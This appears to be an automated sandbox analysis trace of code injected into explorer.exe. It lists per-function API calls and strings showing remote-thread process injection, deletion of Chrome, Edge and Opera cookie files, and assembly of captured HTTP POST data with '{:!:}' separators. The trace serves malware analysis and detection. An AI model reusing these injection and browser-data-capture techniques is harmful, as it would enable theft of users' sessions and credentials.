                            • Instruction Fuzzy Hash: 3D5138B2A442D25BD7308EBADC806B577A4EF52320B180779C8F2CB3C6E7B45906E750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Basic blocks: ce1235-ce1247 (OpenFileMappingA) branches either to ce1249-ce1259 (MapViewOfFile) or directly to ce125c-ce1260; ce1249-ce1259 falls through to ce125c-ce1260
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00CE123F
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00CE3C3C), ref: 00CE1251
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 79f7312ad92f8b19e73ee2b73b5f5bb35f9f6b33461aed6e8098bb8b26f715c5
                            • Instruction ID: 8f882f9a64e34bdc53e08d15cd887b620293021d21eeba0d09de81e21591d196
                            • Opcode Fuzzy Hash: 79f7312ad92f8b19e73ee2b73b5f5bb35f9f6b33461aed6e8098bb8b26f715c5
                            • Instruction Fuzzy Hash: EED017327012716BE3345E6B6C4CF876EDDDF86AE1B060035B609D7090E6608810C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Basic blocks: ce1261-ce1273 (UnmapViewOfFile, FindCloseChangeNotification)
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,00000000,00CE3C67,00000001), ref: 00CE1265
                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CE126C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: d6abf6270d4d30e419d498bb87c80294f7b22a32538f5ca758fc27222813bad2
                            • Instruction ID: 961ed6c52c4be3efce48eb7cde097de6321e34a9cb33552b0fa25bf62f741157
                            • Opcode Fuzzy Hash: d6abf6270d4d30e419d498bb87c80294f7b22a32538f5ca758fc27222813bad2
                            • Instruction Fuzzy Hash: C3B012364050709B872C27267E8CBCF3E18DE492313010171F709890104724080196E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,77296900,00000001,?), ref: 00CE216F
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00CE21AA
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00CE223A
                            • RtlMoveMemory.NTDLL(00000000,00CE5078,00000016), ref: 00CE2261
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00CE2289
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00CE2299
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 00CE22B3
                            • GetLastError.KERNEL32 ref: 00CE22BB
                            • CloseHandle.KERNEL32(00000000), ref: 00CE22C9
                            • Sleep.KERNEL32(000003E8), ref: 00CE22D0
                            • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00CE22E6
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE22ED
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE2303
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE232D
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE2340
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2347
                            • Sleep.KERNEL32(000001F4), ref: 00CE234E
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE2362
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CE2379
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2386
                            • CloseHandle.KERNEL32(?), ref: 00CE238C
                            • CloseHandle.KERNEL32(?), ref: 00CE2392
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2395
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1066286714-2737717697
                            • Opcode ID: f5d28f8beb99f075a253e97ed13da630139a0d06317136eabe87be992886144f
                            • Instruction ID: b479a352862d5fb12cb70224416efa1b666a41911b96961da983634ade25e164
                            • Opcode Fuzzy Hash: f5d28f8beb99f075a253e97ed13da630139a0d06317136eabe87be992886144f
                            • Instruction Fuzzy Hash: AB618B71604384AFD3149F26DC84F6F7BEDEB88764F000529FA59D62A1DB74DE048BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • PathCombineW.SHLWAPI(00000000,00000000,*.*,772D82B0,00000000,74DC3BB0,77D4D600), ref: 00CE15EB
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE15F7
                            • lstrcmpiW.KERNEL32(?,00CE41C8), ref: 00CE1623
                            • lstrcmpiW.KERNEL32(?,00CE41CC), ref: 00CE1633
                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE164C
                            • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00CE1661
                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE167E
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE169C
                            • FindClose.KERNEL32(00000000), ref: 00CE16AB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                            • String ID: *.*$Cookies*
                            • API String ID: 4256701249-3228320225
                            • Opcode ID: f961f5ab2a5fbe6d8bb8cce667c184195c3b3dbd8b8b2637f81eddfd226452ca
                            • Instruction ID: 97cbc7557415602b089d255e666bf40be2d03cd814444625f47088e33379214c
                            • Opcode Fuzzy Hash: f961f5ab2a5fbe6d8bb8cce667c184195c3b3dbd8b8b2637f81eddfd226452ca
                            • Instruction Fuzzy Hash: E521B1316043855BD704AB629C84B7F7BECEB88391F080929FD96D7241DA38CE9497A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE13FE: wsprintfW.USER32 ref: 00CE142A
                              • Part of subcall function 00CE13FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE1439
                              • Part of subcall function 00CE13FE: wsprintfW.USER32 ref: 00CE1476
                              • Part of subcall function 00CE13FE: RemoveDirectoryW.KERNEL32(00000000), ref: 00CE149C
                              • Part of subcall function 00CE13FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE14AF
                              • Part of subcall function 00CE13FE: FindClose.KERNEL32(00000000), ref: 00CE14BA
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfW.USER32 ref: 00CE150D
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                            • wsprintfW.USER32 ref: 00CE1557
                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                            • DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                            • FindClose.KERNEL32(00000000), ref: 00CE158F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                            • String ID: %s%s$*.*
                            • API String ID: 2055899612-705776850
                            • Opcode ID: 6d7cc1f3a13fc2cde01a92d93e08fa0972235f3def94e84e65da2b3ad77781a9
                            • Instruction ID: 72eacf2246309106c4f68a89d2de88274038c442bf2fd6b8f68fbb33da597c14
                            • Opcode Fuzzy Hash: 6d7cc1f3a13fc2cde01a92d93e08fa0972235f3def94e84e65da2b3ad77781a9
                            • Instruction Fuzzy Hash: E5113B316003C05BD714BB369C89B7F3B9CDFD9355F040529FE62821A2DB348EA492A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfW.USER32 ref: 00CE142A
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE1439
                            • wsprintfW.USER32 ref: 00CE1476
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                            • RemoveDirectoryW.KERNEL32(00000000), ref: 00CE149C
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE14AF
                            • FindClose.KERNEL32(00000000), ref: 00CE14BA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                            • String ID: %s%s$%s%s\$*.*
                            • API String ID: 2055899612-4093207852
                            • Opcode ID: 19e110ab74d8716f3fe38bf839ef6530df0d50392b68097a554edb16b3e849b5
                            • Instruction ID: f635685fba3fff49cad17becef31628874321fcc47734a38452b8dd676dcdd22
                            • Opcode Fuzzy Hash: 19e110ab74d8716f3fe38bf839ef6530df0d50392b68097a554edb16b3e849b5
                            • Instruction Fuzzy Hash: 9F110F316043C05BE718AB26DC88B7F7ADCAFD5311F08092CFE92922D2DB344D989662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00CE11A9
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00CE11C1
                            • lstrlen.KERNEL32(?,00000000), ref: 00CE11C9
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00CE11D4
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00CE11EE
                            • wsprintfA.USER32 ref: 00CE1205
                            • CryptDestroyHash.ADVAPI32(?), ref: 00CE121E
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CE1228
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: 32c423b56c3b2a2286bdc6f01c86d0a049b972538d393681b9de0e30b2d57dca
                            • Instruction ID: 83ca41399bf34b4700f9a8f81d86a1cd6c4a71092db5e449d02f2ad5b661e22e
                            • Opcode Fuzzy Hash: 32c423b56c3b2a2286bdc6f01c86d0a049b972538d393681b9de0e30b2d57dca
                            • Instruction Fuzzy Hash: 79113A72900148BFEB159FA5EC89FAEBBBCEB48311F1044B5FA05E6160DB714E51AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00CE16D9
                            • GetCurrentThreadId.KERNEL32 ref: 00CE16E1
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CE16F1
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00CE16FF
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00CE171E
                            • SuspendThread.KERNEL32(00000000), ref: 00CE172E
                            • CloseHandle.KERNEL32(00000000), ref: 00CE173D
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00CE174D
                            • CloseHandle.KERNEL32(00000000), ref: 00CE1758
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: 49679ee67004957a7e551f1e0b5b00fa98717a768a8e3f31a60a4d868a63af3b
                            • Instruction ID: 2d265c502fc05100b894c7fcd9f9d5a6eded7db1b72e9697bb7bc36acf7267a9
                            • Opcode Fuzzy Hash: 49679ee67004957a7e551f1e0b5b00fa98717a768a8e3f31a60a4d868a63af3b
                            • Instruction Fuzzy Hash: D71130714082C0DFD7159F62AC8C76E7AA8EF85B11F04052AFB4196150D7348A559BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00CE1FD8
                            • LoadLibraryA.KERNEL32(?,00CE6050,00000000,00000000,772EF560,00000000,00CE2231,?), ref: 00CE2000
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00CE202D
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00CE207E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: 6d47c2c2d14d7a73a35666e228d61bda2a9cb4d981ba90d0393c398e3f991a55
                            • Instruction ID: c01990cf1e77c59e70e0c9af3b75dbac9caf20e54dfb9358e7a7baefe297b0a8
                            • Opcode Fuzzy Hash: 6d47c2c2d14d7a73a35666e228d61bda2a9cb4d981ba90d0393c398e3f991a55
                            • Instruction Fuzzy Hash: 1331B472300252ABCB28CF6BCC84B66B7ACFF45304F14452DE856CB281D736E955D7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32 ref: 00CE1771
                            • CryptBinaryToStringA.CRYPT32(?,00000000,00000001,00000000,?), ref: 00CE1786
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • CryptBinaryToStringA.CRYPT32(?,00000000,00000001,00000000,?), ref: 00CE17A6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                            • String ID:
                            • API String ID: 117552131-0
                            • Opcode ID: 90dd18ae899f1869cb2191b8a3477262521ceea84f35085981afc93a3fa68a29
                            • Instruction ID: d78ff57c7f8de37e1ad3692fb6746624126ab5f5a3b055746aeaf55262f47605
                            • Opcode Fuzzy Hash: 90dd18ae899f1869cb2191b8a3477262521ceea84f35085981afc93a3fa68a29
                            • Instruction Fuzzy Hash: 71F0E932600159FBD7248AD69CC5FBFFBACDB41A90B040079FA05C6100DAB18E0192B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                              • Part of subcall function 00CE104C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00CE1056
                              • Part of subcall function 00CE29B4: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 00CE29F7
                            • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00CE2B80
                            • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00CE2BA2
                            • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00CE2BC3
                            • RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE2BCC
                            • StrToIntA.SHLWAPI(00000000), ref: 00CE2BEF
                            • wnsprintfA.SHLWAPI ref: 00CE2C47
                            • lstrcat.KERNEL32(00000000,?), ref: 00CE2C67
                            • lstrcat.KERNEL32(00000000,{:!:}), ref: 00CE2C6F
                            • lstrcat.KERNEL32(00000000,?), ref: 00CE2C82
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                            • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                            • API String ID: 2605944266-950501416
                            • Opcode ID: 6961c281f3283a8696173d18d7e4fbf3a8d386201901eba049e11c6eb36a953a
                            • Instruction ID: 419b63a53dfb031173d653caa33f941cb9dad1b8ec1d443c285cdff7b8c32b7f
                            • Opcode Fuzzy Hash: 6961c281f3283a8696173d18d7e4fbf3a8d386201901eba049e11c6eb36a953a
                            • Instruction Fuzzy Hash: A051C3706043C15FDB1DEF26C881B2EB7EAAF84354F04081CF89697292CB38DD859756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            • RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                            • StrToIntA.SHLWAPI(?), ref: 00CE30D7
                            • lstrlen.KERNEL32(00000000), ref: 00CE3105
                            • wsprintfA.USER32 ref: 00CE316C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                            • lstrcat.KERNEL32(?,{:!:}), ref: 00CE31AB
                            • lstrlen.KERNEL32(?,?,?,?,?,00000001), ref: 00CE31BC
                            • RtlMoveMemory.NTDLL(00000000), ref: 00CE31C5
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                            • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                            • API String ID: 2886538537-1627781280
                            • Opcode ID: f9f36f284eb7597694a283ccca71c28be7da1ba70944ad317b332957b6a5ac9e
                            • Instruction ID: cc54d6063a68f5de7afd64840be07e6692bb66825f220707d8280e443a23253b
                            • Opcode Fuzzy Hash: f9f36f284eb7597694a283ccca71c28be7da1ba70944ad317b332957b6a5ac9e
                            • Instruction Fuzzy Hash: 0D31E2717003C16BDB18AB278C9AB2F36AEDBC4740F04443CF9029B286DA74ED4997A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                              • Part of subcall function 00CE1363: lstrcmpi.KERNEL32(?), ref: 00CE13A3
                              • Part of subcall function 00CE1363: Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE37DB
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE37FC
                            • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00CE380E
                              • Part of subcall function 00CE15BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,772D82B0,00000000,74DC3BB0,77D4D600), ref: 00CE15EB
                              • Part of subcall function 00CE15BE: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE15F7
                              • Part of subcall function 00CE15BE: lstrcmpiW.KERNEL32(?,00CE41C8), ref: 00CE1623
                              • Part of subcall function 00CE15BE: lstrcmpiW.KERNEL32(?,00CE41CC), ref: 00CE1633
                              • Part of subcall function 00CE15BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE164C
                              • Part of subcall function 00CE15BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE169C
                              • Part of subcall function 00CE15BE: FindClose.KERNEL32(00000000), ref: 00CE16AB
                            • RtlZeroMemory.NTDLL(00000000,00001000), ref: 00CE3824
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE382D
                            • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 00CE3839
                            • RtlZeroMemory.NTDLL(00000000,00001000), ref: 00CE384D
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE3856
                            • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 00CE3862
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                            • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                            • API String ID: 909495591-1175993956
                            • Opcode ID: c27aef6f1450ffac015b77dac7434adf20f983906f31d726e037163eebd12d3d
                            • Instruction ID: 49bb08cb96476d96d17ab7f0ce998b30a2d5ab110e41c0d8a709907c54384225
                            • Opcode Fuzzy Hash: c27aef6f1450ffac015b77dac7434adf20f983906f31d726e037163eebd12d3d
                            • Instruction Fuzzy Hash: 3611A5703823D877E92933635C87F6F564DDF96B91F140025FA059F2C2CEA49E1152BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                              • Part of subcall function 00CE1363: lstrcmpi.KERNEL32(?), ref: 00CE13A3
                              • Part of subcall function 00CE1363: Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • Sleep.KERNEL32(000003E8,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE36A4
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE36BD
                            • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00CE36CD
                            • wsprintfW.USER32 ref: 00CE36EE
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE371C
                            • lstrcatW.KERNEL32(00000000,00CE45F4), ref: 00CE372C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                            • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                            • API String ID: 2436889709-3669280581
                            • Opcode ID: 8bb0ac5987d2e27e9c7e048f0b450d2700d5097cbffd78844dbf7755914a8850
                            • Instruction ID: a52b9e81d1a8941c44fb3a94beb1e44e077eff55255132514a78323adefa3e3b
                            • Opcode Fuzzy Hash: 8bb0ac5987d2e27e9c7e048f0b450d2700d5097cbffd78844dbf7755914a8850
                            • Instruction Fuzzy Hash: 7511A1717402C067EF1C33676CCEF3E256AEBC5B51F080028FB16AA2D1CEA409906276
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00CE32E0
                            • wsprintfA.USER32 ref: 00CE3351
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CE3362
                            • lstrcat.KERNEL32(00000000,{:!:}), ref: 00CE3371
                            • lstrlen.KERNEL32(00000000), ref: 00CE3374
